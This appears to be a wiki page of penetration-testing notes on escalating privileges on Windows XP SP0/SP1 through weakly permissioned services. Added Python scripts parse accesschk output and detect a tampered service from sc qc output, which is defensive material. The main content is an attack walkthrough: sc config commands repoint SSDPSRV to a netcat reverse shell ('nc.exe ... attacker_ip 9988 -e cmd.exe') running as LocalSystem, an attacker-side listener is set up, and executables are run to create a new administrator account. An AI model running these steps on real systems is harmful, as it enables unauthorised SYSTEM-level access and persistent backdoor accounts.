EoP for WinXP SP0, SP1

lethanhtung01011980 edited this page Oct 9, 2019 · 6 revisions

Notes

  • Use accesschk to find services that low-privilege users have RW access to
  • On XP SP0/SP1 either upnphost or SSDPSRV will do

Copy accesschk to the victim

  • cd C:\Inetpub\wwwroot\winxp

Check for services with insecure permissions

  • accesschk users -cw * /accepteula
  • accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  • accesschk users -cuwcqv * /accepteula
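The accesschk output from the commands above is a list of `RW <service>` lines, each followed by indented access-right names. The following script is an added example (not part of this wiki page or the Sysinternals tool) that parses that text and flags every service the audited principal could repoint with `sc config`; `SAMPLE_OUTPUT` is constructed to mirror the XP SP0/SP1 case, and the `Dnscache` entry is invented to show a write right that does not allow reconfiguration.

```python
"""Audit accesschk -uwcqv output for services a low-privilege principal can reconfigure.

Added example, not code from the original page. Feed it the text printed by
`accesschk.exe -uwcqv "<principal>" * /accepteula`; SAMPLE_OUTPUT below is constructed.
"""
import re
from dataclasses import dataclass, field

# Rights that let the holder change BINARY_PATH_NAME or the service account,
# i.e. exactly what the `sc config` steps on this page need.
DANGEROUS_RIGHTS = {
    "SERVICE_ALL_ACCESS",
    "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC",
    "WRITE_OWNER",
}

# Constructed sample: the two SP0/SP1 services plus an invented benign entry.
SAMPLE_OUTPUT = """\
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS
RW Dnscache
        SERVICE_START
        SERVICE_STOP
"""


@dataclass
class ServiceAccess:
    name: str
    mode: str                              # "RW", "R " or "W " as accesschk prints it
    rights: list = field(default_factory=list)

    def is_reconfigurable(self) -> bool:
        """True if any granted right allows changing the service configuration."""
        return any(r in DANGEROUS_RIGHTS for r in self.rights)


# A service line starts at column 0 with the access mode; right lines are indented.
SERVICE_LINE = re.compile(r"^(RW|R |W )\s*(\S+)\s*$")


def parse_accesschk(text: str) -> list:
    """Turn accesschk -uwcqv output into a list of ServiceAccess records."""
    services = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = SERVICE_LINE.match(raw)
        if m:
            services.append(ServiceAccess(name=m.group(2), mode=m.group(1)))
        elif services and raw[0] in " \t":
            services[-1].rights.append(raw.strip())
    return services


def reconfigurable_services(text: str) -> list:
    """Names of services the audited principal could repoint with `sc config`."""
    return [s.name for s in parse_accesschk(text) if s.is_reconfigurable()]


def report(text: str, principal: str) -> str:
    """Human-readable summary, one line per service, FIX marks the dangerous ones."""
    lines = [f"Services writable by '{principal}':"]
    for s in parse_accesschk(text):
        tag = "FIX" if s.is_reconfigurable() else "ok "
        lines.append(f"  [{tag}] {s.name:<10} {', '.join(s.rights)}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_OUTPUT, "Authenticated Users"))
```

Services tagged `FIX` are the ones whose DACL should be tightened (on later service packs the defaults already exclude these rights for Authenticated Users); `SERVICE_START`/`SERVICE_STOP` alone still shows as write access in accesschk but does not allow the binpath change used below.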

Reconfigure the service with sc so it launches a reverse shell to the attacker

  • sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv attacker_ip 9988 -e C:\WINDOWS\System32\cmd.exe"
  • sc config SSDPSRV depend= ""
  • sc config SSDPSRV obj= ".\LocalSystem" password= ""
  • sc qc SSDPSRV
  • sc config SSDPSRV start= auto
  • net start SSDPSRV
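Every change made by the `sc config` lines above is visible in the `sc qc` output that the same list queries. The script below is an added example (not part of this page) that parses two `sc qc SSDPSRV` captures and reports what a defender would look for: an image outside the Windows or Program Files trees, a netcat/cmd pattern on the command line, and `START_TYPE`, `SERVICE_START_NAME` or `BINARY_PATH_NAME` differing from a known-good baseline. Both captures are constructed: `BASELINE` is SSDPSRV as shipped, `TAMPERED` reflects the commands on this page, and `attacker_ip` is the page's placeholder.

```python
"""Detect a repointed service from `sc qc` output by comparing it with a baseline.

Added example, not code from the original page. BASELINE and TAMPERED are
constructed captures of `sc qc SSDPSRV` before and after the sc config steps.
"""
import re

BASELINE = """\
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\WINDOWS\\System32\\svchost.exe -k LocalService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SSDP Discovery Service
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService
"""

TAMPERED = """\
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: SSDPSRV
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Inetpub\\wwwroot\\nc.exe -nv attacker_ip 9988 -e C:\\WINDOWS\\System32\\cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SSDP Discovery Service
        DEPENDENCIES       :
        SERVICE_START_NAME : .\\LocalSystem
"""

# `sc qc` prints one "KEY : value" pair per line; the [SC] banner does not match.
FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\")
SHELL_HINTS = ("nc.exe", "cmd.exe")      # command-line fragments that never belong to a service
WATCHED = ("BINARY_PATH_NAME", "SERVICE_START_NAME", "START_TYPE", "DEPENDENCIES")


def parse_sc_qc(text: str) -> dict:
    """Map each configuration key to its (stripped) value."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def _image_path(binpath: str) -> str:
    """First token of BINARY_PATH_NAME, honouring a quoted path with spaces; lower-cased."""
    s = binpath.strip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0].lower()
    return s.split(" ", 1)[0].lower()


def audit(current: str, baseline: str) -> list:
    """Return a list of finding strings; empty means the config matches and looks sane."""
    cur, base = parse_sc_qc(current), parse_sc_qc(baseline)
    findings = []
    binpath = cur.get("BINARY_PATH_NAME", "")
    exe = _image_path(binpath)
    if not exe.startswith(TRUSTED_DIRS):
        findings.append(f"image outside trusted directories: {exe}")
    hits = [h for h in SHELL_HINTS if h in binpath.lower()]
    if hits:
        findings.append(f"shell/netcat pattern in command line: {', '.join(hits)}")
    for key in WATCHED:
        if cur.get(key, "") != base.get(key, ""):
            findings.append(f"{key} changed: {base.get(key, '')!r} -> {cur.get(key, '')!r}")
    return findings


if __name__ == "__main__":
    for finding in audit(TAMPERED, BASELINE) or ["no findings"]:
        print(" -", finding)
```

The baseline comparison is what makes this robust: the path and netcat heuristics catch the specific commands on this page, but any change to the start account or start type against a snapshot taken at build time is reported regardless of what the new binary is called.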

Listen on the attacker machine

  • nc -nlvp 9988

From the reverse shell, run an exe that creates a new admin user

  • Write C files that create a new admin user
  • Compile the C files to exe files
  • Run C:\Inetpub\wwwroot\addnewuser.exe
  • Run C:\Inetpub\wwwroot\addusertoAdmin.exe
